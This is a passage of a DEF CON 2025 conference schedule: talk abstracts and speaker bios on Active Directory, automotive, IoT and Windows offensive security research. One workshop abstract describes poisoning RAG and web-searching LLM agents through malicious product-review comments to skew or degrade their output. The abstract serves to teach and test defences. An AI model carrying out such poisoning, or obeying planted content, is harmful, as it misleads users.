Keanu Nys (aka RedByte) is an information security researcher from Belgium, and currently leads spotit's offensive security team. While he has a passion for all offensive cybersecurity topics, he mostly specializes in Active Directory, Microsoft Entra ID (Azure AD), and Social Engineering.

He is the author of the Microsoft 365 and Entra attack toolkit GraphSpy. Additionally, Keanu is the trainer for the Certified Azure Red Team Expert (CARTE) bootcamps at Altered Security, and has presented at hacker conferences such as BruCON.

He has presented at security conferences such as BruCon, and is the author of the Microsoft 365 and Entra attacking toolkit GraphSpy. He is an instructor for various Azure Red Teaming courses with Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 12:00-12:45 PDT


Title: Turning your Active Directory into the attacker’s C2: modern Group Policy Objects enumeration and exploitation
When: Sunday, Aug 10, 12:00 - 12:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

The implementation of Active Directory environments is, by essence, not unlike a command-and-control infrastructure allowing to centrally coordinate and control network assets. As an attacker, why not make it your own ?

As far as the C2 capabilities of Active Directory go, Group Policy Objects (GPOs) are a key functionality that can be leveraged by attackers for a surprisingly wide range of offensive actions. From enumeration, to persistence, to impactful privilege escalation in mature segmented environments, abusing GPOs amounts to abusing the C2 capabilities of Active Directory itself – a powerful attack primitive.

And yet, GPOs received comparatively little attention by the pentesting and research community. GPOs exploitation knowledge and tooling is scarce, whether because implementation may seem kind of obscure, or since exploitation can be seen as risky. Concerns that well-equipped attackers may not have to worry about.

This presentation aims at demonstrating the full extent of possibilities offered by Group Policy Objects. It will dive deep into GPOs implementation, enumeration potential and advanced exploitation techniques introduced or implemented by the speakers these last few years. It will also be accompanied by the release of two enumeration and exploitation tools developed by the speakers.

References:

Speakers:Quentin "croco_byte" Roland,Wilfried "tiyeuse" Bécard

SpeakerBio:  Quentin "croco_byte" Roland

Quentin Roland is a 28-year-old pentester working for a bit more than 3 years for Synacktiv, a French firm dedicated to offensive information security.

He enjoys working on Active Directory, releasing open-source exploitation tools or enhancing existing tooling. He worked on known, trendy Active Directory exploitation primitives as well as on more obscure research topics.

A fun fact about him: he actually studied law and used to work as a lawyer, before turning to penetration testing.

SpeakerBio:  Wilfried "tiyeuse" Bécard

Wilfried Bécard is a hacker and researcher working at Synacktiv. With a particular interest in Active Directory and Azure exploitation, his passion lies in uncovering new techniques to enhance cybersecurity in these areas. Constantly experimenting, testing, and collaborating with the security community, he aims at continuously improve his knowledge in these fields.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 16:00-17:59 PDT


Title: Um, ACKtually...
When: Friday, Aug 8, 16:00 - 17:59 PDT
Where: LVCCWest-Level1-Atrium-East-Contest Stage

Description:

"Um, ACKtually" is a hacker twist on an established gameshow hosted by Dropout TV (Um, Actually). In this show, contestants are read a short statement about film, television, literature, etc. which contains one incorrect detail. The contestants must buzz in with the correction, preceded by the phrase "Um, Actually". In DEF CON's version, these statements are all related to tech / cybersecurity. Anyone who has spent any amount of time on social media, knows how much hackers love to correct each other!

Come watch some of your favorite hacking personalities publicly weaponize mansplaining for your entertainment!"


Return to Index    -    Add to Google    -    ics Calendar file

CHV - Saturday - 13:00-13:30 PDT


Title: Uncovering the Secrets of Tire Pressure Monitoring Systems
When: Saturday, Aug 9, 13:00 - 13:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

In this talk we want to dive deep into the world of direct TPMS. These systems are used by a great portion of the cars today, and typically send information about a car’s tires wirelessly without any encryption or authentication. We show that it is feasible to capture these signals with very low cost hardware to build a tracking infrastructure. We present as well a tool that allows us to create custom TPMS messages and spoof the ECU of different cars.

SpeakerBio:  Yago Lizarribar
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 13:00-13:45 PDT


Title: Unexpected Connections: How a vulnerability in obscure dealer software could have unlocked your car from anywhere
When: Sunday, Aug 10, 13:00 - 13:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Dealers are a vital part of the automotive industry – intentionally separate entities from the manufacturers, but highly interconnected. Most dealers use platforms built by the manufacturers that can be used to order cars, view/store customer information, and manage their day-to-day operations. Earlier this year, new vulnerabilities were discovered in a top automaker’s dealer platform that enabled the creation of a national admin account. This level of access, a privilege reserved for a select few corporate users, opened the door to a wide range of fun exploits.

Want to start a car? Forget VINs – all you needed was someone’s name. Access to the enrollment systems made it possible to reassign ownership of cars and access remote control functionality.

Want to find out who owns that sleek ride next to you? A quick glance at the VIN on the windshield was all you needed to pull down the owner’s personal information using the customer lookup tool.

Want to impersonate the owner of a dealership to gain full access to everything? A user impersonation function was uncovered that made this possible - negating all the two-factor authentication systems.

All of this and much more was made possible through API flaws in a centralized dealer system. A system used by more than 1,000 dealers in the USA that you didn’t even know existed. A system that you would never have thought would be the unexpected connection to your car. We break down the full exploit from recon to initial access, from viewing PII to the satisfying roar of an engine coming to life.

Speakers:Eaton Zveare,Roshan Piyush

SpeakerBio:  Eaton Zveare, Senior Security Research Engineer at Traceable by Harness

Eaton is a senior security research engineer at Traceable by Harness. As a member of the ASPEN Labs team, he has contributed to the security of some of the world's largest organizations by finding and responsibly disclosing many critical vulnerabilities. He is best known for his high-profile security disclosures in the automotive space: 1, 2, 3.

SpeakerBio:  Roshan Piyush, Security Research at Traceable by Harness

Roshan Piyush leads Security Research at Traceable by Harness, where he also oversees Aspen Labs — Harness's dedicated initiative for advancing modern application and API security. He is at the forefront of developing next-generation security platforms that deliver deep protection across the software lifecycle, from code to runtime.

With over a decade of experience in cybersecurity and a recent focus on API security, Roshan researches cutting-edge detection and prevention techniques across CI/CD pipelines, software supply chains, runtime environments, and cloud-native architectures. His work powers enterprise-grade security solutions that help organizations stay ahead of evolving threats.

An active contributor to the open-source security community, Roshan has been involved with projects like OWASP crAPI and Coraza WAF. He frequently shares his insights through technical talks, tools, and collaborations, helping drive progress across the broader AppSec ecosystem.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 13:00-13:45 PDT


Title: Unmanned Wireless Penetration Testing Device
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

The Unmanned Wireless Penetration Testing Device is a modular, open-source system enabling remote wireless security assessments. Using long-range LoRa communication, a mobile rover can perform Wi-Fi reconnaissance, deauthentication attacks, Bluetooth device discovery, and image capture without requiring proximity to the target network. Controlled entirely via encrypted LoRa packets, the system is optimized for secure operations in remote or inaccessible environments. Attendees will see live demonstrations of wireless attacks issued over LoRa and learn how the system can be adapted for mobile and drone-based security operations. Source code and build instructions will be freely available under an open license.

Speakers:Ayaan Qayyum,Omar Hamoudeh

SpeakerBio:  Ayaan Qayyum

Ayaan is a Master of Science student in electrical engineering at Columbia University. His research interests include mobile computing, applied machine learning, edge AI, digital signal processing, mathematical modeling, and information systems. He completed his undergraduate studies at Rutgers University–New Brunswick, earning a Bachelor of Science in electrical and computer engineering with a minor in mathematics. His technical background spans embedded systems, wireless communication, and hardware security, with certifications in AWS AI and cloud technologies. He has published research across cybersecurity, FPGA systems, and machine learning, including a project on FPGA fast Fourier transform implementation and a machine learning-based stock forecasting model. His work has been recognized at academic conferences such as the IEEE Integrated STEM Education Conference and the Rutgers JJ Slade Research Symposium. He is currently a technical research intern at the Intelligent and Connected Systems Laboratory at Columbia University. He was a program mentor for the Governor's School of New Jersey designing search-and-rescue drone systems utilizing real-time edge inference. He is passionate about building scalable, open-source security tools and bridging the gap between theory and real-world deployment.

SpeakerBio:  Omar Hamoudeh

Omar is a wireless security enthusiast and builder who recently completed his B.S. in electrical and computer engineering at Rutgers University. His work focuses on embedded systems security, hardware hacking, and wireless exploitation. As part of a senior design project, he developed an unmanned wireless penetration testing rover using LoRa for remote Wi-Fi scanning and reconnaissance. The project earned second place at the 2025 Rutgers ECE Capstone Expo. He also worked extensively on secure architecture projects, including implementing TrustZone on an ARM-based microcontroller to separate secure and non-secure execution environments. In a separate project, he designed a lightweight firmware validation system to detect unauthorized modifications in IoT devices. His current research centers on building low-profile tools for wireless network exploitation and resilience testing.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 11:00-11:45 PDT


Title: Unmanned Wireless Penetration Testing Device
When: Saturday, Aug 9, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

The Unmanned Wireless Penetration Testing Device is a modular, open-source system enabling remote wireless security assessments. Using long-range LoRa communication, a mobile rover can perform Wi-Fi reconnaissance, deauthentication attacks, Bluetooth device discovery, and image capture without requiring proximity to the target network. Controlled entirely via encrypted LoRa packets, the system is optimized for secure operations in remote or inaccessible environments. Attendees will see live demonstrations of wireless attacks issued over LoRa and learn how the system can be adapted for mobile and drone-based security operations. Source code and build instructions will be freely available under an open license.

Speakers:Ayaan Qayyum,Omar Hamoudeh

SpeakerBio:  Ayaan Qayyum

Ayaan is a Master of Science student in electrical engineering at Columbia University. His research interests include mobile computing, applied machine learning, edge AI, digital signal processing, mathematical modeling, and information systems. He completed his undergraduate studies at Rutgers University–New Brunswick, earning a Bachelor of Science in electrical and computer engineering with a minor in mathematics. His technical background spans embedded systems, wireless communication, and hardware security, with certifications in AWS AI and cloud technologies. He has published research across cybersecurity, FPGA systems, and machine learning, including a project on FPGA fast Fourier transform implementation and a machine learning-based stock forecasting model. His work has been recognized at academic conferences such as the IEEE Integrated STEM Education Conference and the Rutgers JJ Slade Research Symposium. He is currently a technical research intern at the Intelligent and Connected Systems Laboratory at Columbia University. He was a program mentor for the Governor's School of New Jersey designing search-and-rescue drone systems utilizing real-time edge inference. He is passionate about building scalable, open-source security tools and bridging the gap between theory and real-world deployment.

SpeakerBio:  Omar Hamoudeh

Omar is a wireless security enthusiast and builder who recently completed his B.S. in electrical and computer engineering at Rutgers University. His work focuses on embedded systems security, hardware hacking, and wireless exploitation. As part of a senior design project, he developed an unmanned wireless penetration testing rover using LoRa for remote Wi-Fi scanning and reconnaissance. The project earned second place at the 2025 Rutgers ECE Capstone Expo. He also worked extensively on secure architecture projects, including implementing TrustZone on an ARM-based microcontroller to separate secure and non-secure execution environments. In a separate project, he designed a lightweight firmware validation system to detect unauthorized modifications in IoT devices. His current research centers on building low-profile tools for wireless network exploitation and resilience testing.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 15:30-16:15 PDT


Title: Unmasking the Snitch Puck: the creepy IoT surveillance tech in the school bathroom
When: Friday, Aug 8, 15:30 - 16:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

With the commoditization of IoT surveillance technology, private and public entities alike have been rushing to put every facet of our lives under surveillance. Unfortunately, schools are no exception in the ongoing privacy race to the bottom. In this talk, we present our analysis of a popular line of IoT vape detectors marketed primarily to schools. Rey first learned of the existence of this device while he was a student in high school, scanning the local network during his lunch break. He became obsessed with the idea of reverse-engineering it, and a couple of years later he got an opportunity when a specimen appeared on eBay.

This talk will cover our journey of acquiring the device and doing a hardware teardown. Then, we'll talk about dumping the firmware, examining its behavior, and doing some light reverse-engineering to uncover some fun appsec vulnerabilities. We'll discuss implications of our findings on this particular series of devices, as well as on the ed-tech surveillance industry as a whole.

We will release a copy of the device filesystem, as well as our scripts for decrypting OEM firmware and packing custom firmware updates.

Speakers:Reynaldo "buh0",nyx

SpeakerBio:  Reynaldo "buh0"

Rey started out finding bugs and holes in websites at 15. He began attending local infosec meetups in Portland, Oregon—like RainSec and PDX2600—soaking up everything he could. After stumbling across a creepy surveillance device at his high school, he drifted into hardware security and reverse engineering. He’s determined to keep learning and digging deeper.

SpeakerBio:  nyx

nyx is a Portland-based hacker, engineer, and self-described cyberpunk. As an unwilling participant in the late-capitalist, mass-surveillance dystopia, he is passionate about digital privacy, data self-custody, and running his own infra. Ultimately, he hopes to wrest control of his online life back from the megacorps and help others do the same. He holds the OSCP, and in his professional life he develops system software for a Fortune 100 tech company's internal consulting team, specializing in security, networks, and devops. When not making a living looking at the bad screen, in his free time he enjoys looking at the good screen.


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Sunday - 11:30-11:59 PDT


Title: Unveiling IoT Vulnerabilities: From Backdoors to Bureaucracy
When: Sunday, Aug 10, 11:30 - 11:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

IoT devices are ubiquitous, yet their security remains a critical concern. This talk explores over 50 real-world vulnerability cases in the IoT ecosystem, exposing systemic issues such as vendor-embedded backdoors, predictable credentials, and exploitable configuration consoles. We’ll dissect vulnerabilities like CVE-2024-48271 (CVSS 9.8) and CVE-2025-1143, favored by APT groups and scammers, that enable remote code execution and global device control. Drawing from our extensive research, we’ll reveal how even beginners can compromise critical infrastructure like ATMs and water treatment facilities by targeting poorly secured devices. Additionally, we’ll share the frustrating reality of reporting vulnerabilities to manufacturers, CNAs, and CERTs—stories of ignored reports, year-long delays, and denials despite severe risks. Attendees will gain actionable insights into vulnerability discovery, secure development practices, and responsible disclosure, empowering hackers, developers, and manufacturers to strengthen IoT security.

SpeakerBio:  Kai-Ching "Keniver" Wang, Senior Security Researcher at CHT Security

Kai-Ching Wang (Keniver) is a Senior Security Researcher at CHT Security. He specializes in red team assessments and comprehensive security reviews, with a current focus on hacking IoT devices and cloud-native infrastructure. He has presented his research on the security of cloud-connected IoT camera systems at conferences such as SECCON in Japan and HITCON in Taiwan.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 15:10-15:40 PDT


Title: Unveiling the shadows: Digital Forensics evidence in AI-Driven CyberCrime
When: Saturday, Aug 9, 15:10 - 15:40 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
Speakers:Neumann "scsideath" Lim,Jugal Patel,Stephanie Corvese,Debasis Parida

SpeakerBio:  Neumann "scsideath" Lim, COO at World Cyber Health

Neumann Lim has a strong background in cybersecurity and infrastructure management currently leading the Odlum Brown Team. He also has an extensive IR experience at previous companies such as Deloitte Canada, EY, CGI, and ISA. Currently, Neumann is serving in advisory board roles at SANS, EC-Council and other organizations. Neumann’s expertise includes digital forensics, incident response, modernizing infrastructure, infrastructure resilience, site reliability, malware research, pentesting and leadership in information security policies. Outside of corporate life, Neumann is the co-founder of Malware Village, judge and participant of various cyber CTFs. Neumann is often seen speaking or leading workshops at various conferences such as DEFCON, BlueTeamVillage, GrayhatCon, BSides, Toronto CISO Summit, CCTX, HTCIA, IACIS.

SpeakerBio:  Jugal Patel
No BIO available
SpeakerBio:  Stephanie Corvese
No BIO available
SpeakerBio:  Debasis Parida
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 13:40-13:55 PDT


Title: Using Stardew Valley mods as a C2 and infostealer
When: Friday, Aug 8, 13:40 - 13:55 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Gecko
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

ASV - Friday - 15:00-15:30 PDT


Title: VDP in Aviation - How it shouldn't be done!
When: Friday, Aug 8, 15:00 - 15:30 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Vulnerability Disclosure in Aviation has long been, and continues to be, a very sensitive topic. Whilst large improvements have been made by some in recent years, there are still some corners of the industry who could do much better. Gaffers has experience in both submitting and receiving vulnerability disclosures within the industry and will share some stories highlighting the good, the bad, and the ugly.

SpeakerBio:  Matt Gaffney, United Airlines
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 12:00-13:50 PDT


Title: Vector Space Manipulation in LLMs
When: Friday, Aug 8, 12:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 4 - Map

Description:

A vector space is a mathematical framework where words, phrases, sentences, or even entire documents are represented as numerical vectors. These vectors capture both semantic and syntactic relationships between linguistic units, enabling models to process and generate text effectively.

Words are mapped to high-dimensional vectors within a continuous vector space. In models such as Word2Vec, GloVe, and large language models (LLMs), each word is represented as a dense vector (e.g., 300 dimensions or more). These vectors are learned during training and encode semantic relationships. For example, the vectors for king and queen will be close to each other in the vector space due to their similar contexts. In LLMs like GPT and BERT, word vectors are not static but vary depending on context. This means the same word can have different vector representations based on the surrounding words. For instance, the word bank will have distinct vector representations in river bank versus financial bank.

In this workshop we will explore tactics to manipulate the vector space. These methods include Prompt engineering and poisoning data streams with in them, The method target RAG (Retrieval augment Generation) based LLM applications, LLM Agents and LLM that search the web for accessing information. The methods results in DoS conditions and manipulated data generation in LLM models. An attack scenario is putting a malicious comment in an online product review system, so when the LLM access it its output will be manipulated or its performance will be degraded.

SpeakerBio:  Muhammad Mudassar Yamin

Dr. Muhammad Mudassar Yamin is currently working as an Associate Professor at the Department of Information and Communication Technology at the Norwegian University of Science and Technology (NTNU). He is a member of the system security research group, and the focus of his research is on system security, penetration testing, security assessment, and intrusion detection. Before joining NTNU, Mudassar worked as an Information Security consultant and served multiple government and private clients. He holds multiple cybersecurity certifications, such as OSCE, OSCP, LPT-MASTER, CEH, CHFI, CPTE, CISSO, and CBP.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 21:00-01:59 PDT


Title: VETCON 2025 Party
When: Saturday, Aug 9, 21:00 - 01:59 PDT
Where: LVCCWest-Level3-W327 - Map

Description:

DEF CON is renowned for bringing together some of the brightest minds in technology and security. By participating in VETCON, you have the chance to highlight the critical role veterans play in this landscape and explore how technology can support and enhance their lives.


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Friday - 17:30-17:59 PDT


Title: Vibe School: Making dumb devices smart with AI
When: Friday, Aug 8, 17:30 - 17:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

Smart home technology often comes with a hefty price tag, particularly for specialized devices like weather stations. So instead I did it myself, instead of buying an expensive 'smart' device, I integrated a conventional weather station into Home Assistant. With AI-powered assistance and "vibe coding" approach, even complex devices can be made smart. From sniffing device communications to getting Gemini to generate C++. With modern AI tools, empowering your existing "dumb" devices is more accessible and achievable than ever before, opening up a world of custom smart solutions without breaking the bank.

SpeakerBio:  Katie "InsiderPhD" Paxton-Fear, Principal Security Researcher at Traceable by Harness

Dr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep, in her words: she used to make applications and now she breaks them. A former API developer turned API hacker. She has found vulnerabilities in organizations ranging from the Department of Defense to Verizon, with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. As she shares some of the easy way hackers can exploit APIs and how they get away without a security alert! Dr Katie regularly delivers security training, security research, to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 11:00-11:45 PDT


Title: Virtualization-Based (In)security - Weaponizing VBS Enclaves
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Virtualization Based Security (VBS) is one of the most fascinating security advancements of recent years - the ability to isolate critical components of the OS enabled Microsoft to achieve substantial security improvements with features like Credential Guard and HVCI.

One of the more interesting features enabled through VBS are VBS Enclaves - a technology that allows a process to isolate a region of its memory, making it completely inaccessible to other processes, the process itself, and even the kernel.

While VBS enclaves can have a wide range of security applications, they can also be very appealing to attackers - running malware in an isolated region, out of the reach of EDRs and security analysts? Sign us up!

With this research we set out to explore the concept of enclave malware. We will dive into VBS enclaves while exploring previously undocumented behaviors, and describe the different scenarios that can enable attackers to run malicious code inside enclaves.

We will then work towards weaponizing VBS enclaves - we will describe the different techniques that could be used by malware running within enclaves, and show how they enable creating stealthy implants that can go completely undetected.

References:

Microsoft VBS enclave documentation Windows Internals 7th edition, part 1 Windows Internals 7th edition, part 2 CVE-2023-36880 exploit VBS enclave exploitation

SpeakerBio:  Ori David

Ori David is a senior security researcher at Akamai, his research is focused on offensive security, malware analysis, and threat hunting.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 17:30-17:50 PDT


Title: Voice Cloning Air Traffic Control: Vulnerabilities at Runway Crossings
When: Saturday, Aug 9, 17:30 - 17:50 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Voice cloning technology has advanced significantly, enabling the creation of convincing voice replicas using consumer-grade devices and publicly available tools. This poses critical challenges to aviation communication, where trust between pilots and air traffic controllers is paramount. The reliance on AM radio, with its low fidelity and lack of authentication, exacerbates the risk of fraudulent communications. This talk examines trust factors within aviation's air traffic control system, focusing on how air traffic controllers' voices can be cloned and where planes are most at risk. The talk explores FCC enforcement techniques for locating malicious actors, historical perspectives on alternative radio technologies, and the secondary systems pilots employ during communication failures. Simulated attacks will demonstrate how these vulnerabilities could disrupt operations, particularly at critical points such as runway crossings and in low-visibility conditions.

To mitigate these risks, this talk evaluates existing safeguards, including the Traffic Collision Avoidance System (TCAS), and discusses emerging technologies such as stop bars and guided runway lighting.

References:

SpeakerBio:  Andrew "Helicopters of DC" Logan

Andrew Logan is an audio engineer, independent aviation journalist and developer @HelicoptersofDC who presented Tracking Military Ghost Helicopters over Washington DC at Def Con 30. Since then his advocacy urging lawmakers to review ADS-B exemptions for government aircraft has been cited by the Senate in the wake of the Flight 5342 crash.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 12:00-12:59 PDT


Title: Voices from the Frontlines: Managing Bug Bounties at Scale
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Bug bounty programs have become a cornerstone of modern security strategy, but managing them at scale is anything but simple. In this panel, leaders from some of the world’s largest and most mature bug bounty programs, including Amazon, PayPal, AWS, Shopify, and Splunk, will share hard-won insights from the frontlines.

We will explore the nuances of triage, researcher relationships, reward strategies, internal buy-in, legal hurdles, and responsible scaling. Panelists will also discuss how bug bounty culture is shifting, what is working (and what is not), and how they are evolving their programs to meet today’s threat landscape.

Whether you are running a bounty program, hacking in one, or simply curious about what happens behind the scenes, this candid discussion will surface lessons, real-world experiences, and future-focused perspectives from those who lead these programs every day.

Speakers:Gabriel Nitu,Jay Dancer,Tyson Laa Deng,Ryan Nolette,Goshak

SpeakerBio:  Gabriel Nitu, Splunk

Splunk Offensive Security Engineer with over 9 years of experience poking holes in things (responsibly, of course) and helping others sleep at night (sometimes). Whether it’s finding flaws in a product before the bad guys sniff them out, leading incident response like a firefighter, or scaling bug bounty programs, Gabriel brings a mix of curiosity, chaos, and calm.

SpeakerBio:  Jay Dancer, Shopify
No BIO available
SpeakerBio:  Tyson Laa Deng, Paypal
No BIO available
SpeakerBio:  Ryan Nolette, Amazon / AWS
No BIO available
SpeakerBio:  Goshak , Amazon / AWS
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Saturday - 14:00-14:45 PDT


Title: Voices of the Industry: A Fireside Chat with Payment Leaders
When: Saturday, Aug 9, 14:00 - 14:45 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
Speakers:Leigh-Anne Galloway,Giustina Kent,Daniel Cuthbert

SpeakerBio:  Leigh-Anne Galloway
No BIO available
SpeakerBio:  Giustina Kent, Visa
No BIO available
SpeakerBio:  Daniel Cuthbert
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 17:00-17:30 PDT


Title: VRP @ Google -- a look inside a large self-hosted VRP
When: Friday, Aug 8, 17:00 - 17:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

This presentation will share the unique, and sometimes unusual, aspects of the Google Vulnerability Rewards Program (VRP), Google’s self-hosted bug bounty program. We’ll begin by taking a closer look at a bug rewarded by the VRP, in particular how an external researcher discovered & escalated the bug with the help of Google security engineers, demonstrating how the Google VRP operates and in which ways the Google VRP is slightly different than most other bug bounty programs. In the course of this presentation, we will also cover aspects such as the Google VRP’s reward philosophy, its policies around vulnerability transparency, details of our triage process, and more! This talk will provide multiple actionable takeaways for you to consider for your own bug bounty program.

SpeakerBio:  Sam "erbbysam" Erb, Security Engineer at Google

Sam is a security engineer @ Google and helps run the Google & Alphabet VRP. In the past, Sam has won two DEF CON Black Badges and numerous live hacking event awards including an MVH trophy. Sam has submitted hundreds of bug bounty reports and triaged thousands of your reports.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 10:00-10:45 PDT


Title: WarHead
When: Saturday, Aug 9, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

Warhead is an offensive security tool that leverages Windows Atom Tables to store, retrieve, and execute payloads in a stealthy manner. This technique enables adversaries to place a payload in the Atom Table, use a legitimate process to extract it, and execute it in memory—bypassing traditional detection mechanisms. The first version of Warhead, to be released at Black Hat Arsenal 2025, provides security researchers and red teamers with a novel approach to payload delivery and execution that evades modern security defenses.

Speakers:Vishal "Vish" Thakur,David "Votd_ctf" Wearing

SpeakerBio:  Vishal "Vish" Thakur

Vishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.

He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.

SpeakerBio:  David "Votd_ctf" Wearing
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 15:00-15:45 PDT


Title: WarHead
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Warhead is an offensive security tool that leverages Windows Atom Tables to store, retrieve, and execute payloads in a stealthy manner. This technique enables adversaries to place a payload in the Atom Table, use a legitimate process to extract it, and execute it in memory—bypassing traditional detection mechanisms. The first version of Warhead, to be released at Black Hat Arsenal 2025, provides security researchers and red teamers with a novel approach to payload delivery and execution that evades modern security defenses.

Speakers:Vishal "Vish" Thakur,David "Votd_ctf" Wearing

SpeakerBio:  Vishal "Vish" Thakur

Vishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.

He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.

SpeakerBio:  David "Votd_ctf" Wearing
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 13:00-13:50 PDT


Title: Weaponizing Kestrel: Red Team Tradecraft for Hunting
When: Friday, Aug 8, 13:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

This workshop explores how the Kestrel can be innovatively used for hunting advanced threats in critical infrastructures using offensive security methodologies, the workshop delves into techniques and strategies that simulate real-world adversary attacks while also identifying vulnerabilities and anomalous behaviors with offensive techniques before they are exploited in a real scenario. This workshop will perform controlled and simulated attacks, such as network intrusion, data exfiltration, and persistence, to generate artifacts that will serve as the foundation for active threat hunting. We will configure and calibrate Kestrel to identify anomalous patterns within network traffic and system interactions, correlating these patterns with MITRE ATT&CK tactics.

This workshop will innovative the methodology for integrating the Kestrel tool into a threat hunting process within offensive techniques, providing new ways of thinking about advanced threat detection and proactive security

Speakers:Daniel Benavides,Ronald González

SpeakerBio:  Daniel Benavides

Daniel Benavides (Edad: 27), es un experimentado profesional en ciberseguridad con más de 7 años de experiencia en el sector. Durante 4 años y medio, trabajó como Administrador de Sistemas (SysAdmin) para el gobierno de El Salvador, donde fue responsable de la gestión y seguridad de infraestructuras críticas y sistemas gubernamentales. Posteriormente, durante 3 años, se desempeñó como Supervisor de un Security Operations Center (SOC) en RSM US LLP, una destacada firma de consultoría norteamericana, donde lideró equipos en la vigilancia, detección y respuesta a incidentes de seguridad.

Actualmente, Daniel ocupa el rol de Consultor XDR Senior en Palo Alto Networks, donde aplica su experiencia en la implementación y optimización de soluciones avanzadas de detección y respuesta extendida (XDR). Su trabajo se centra en la respuesta a incidentes, la cacería de amenazas, el análisis avanzado de amenazas y la creación de reglas de detección basadas en información de ciberinteligencia, contribuyendo a fortalecer la seguridad de sus clientes.

Su formación académica incluye un grado en Ingeniería en Sistemas de la Universidad Don Bosco en El Salvador, y una Diplomatura en Ciberinteligencia obtenida en España, que complementan sus conocimientos técnicos y estratégicos. Además, Daniel cuenta con una serie de certificaciones profesionales que avalan su pericia en el campo: las certificaciones CompTIA Security+, CompTIA CySA+, certificación en la nube de AWS CLF-C02; así como certificaciones específicas de XDR de Stellar Cyber y Palo Alto Cortex.

Fuera del ámbito profesional, Daniel es un apasionado del Brazilian Jiu Jitsu, en el cual ostenta el cinturón azul, y participa activamente en competencias de Capture The Flag (CTF), demostrando su habilidad en la resolución de desafíos de seguridad. También dedica tiempo a explorar la plataforma de ciberseguridad TryHackMe, donde sigue perfeccionando sus habilidades y conocimientos. Además, le encanta viajar por el mundo, lo que le permite explorar nuevas culturas y perspectivas.

El conjunto de su experiencia profesional, habilidades técnicas avanzadas, formación académica y sus variadas aficiones lo posicionan como un experto integral en el ámbito de la ciberseguridad, con una sólida trayectoria en la protección de sistemas y la gestión de operaciones de seguridad.

SpeakerBio:  Ronald González

Ronald González: Offensive Security Investigator, Threat Hunter and Incident Response, Digital Forensic and SecDevOps with more than 10 years of experience in computer systems, he has been a Government Forensic Expert with specialization in the scene of computer crimes and now as an individual. He is a national and international consultant helping organizations find vulnerabilities. Ronald holds a few recognized certifications including CPTS from HackTheBox, GoogleSecOps, CHFI. He is the leader of the group DEF CON DC11503, HackTheBox El Salvador and BSides El Salvador, and speaker at DEFCON Red Team Village 32, TEDx and many other conference as well


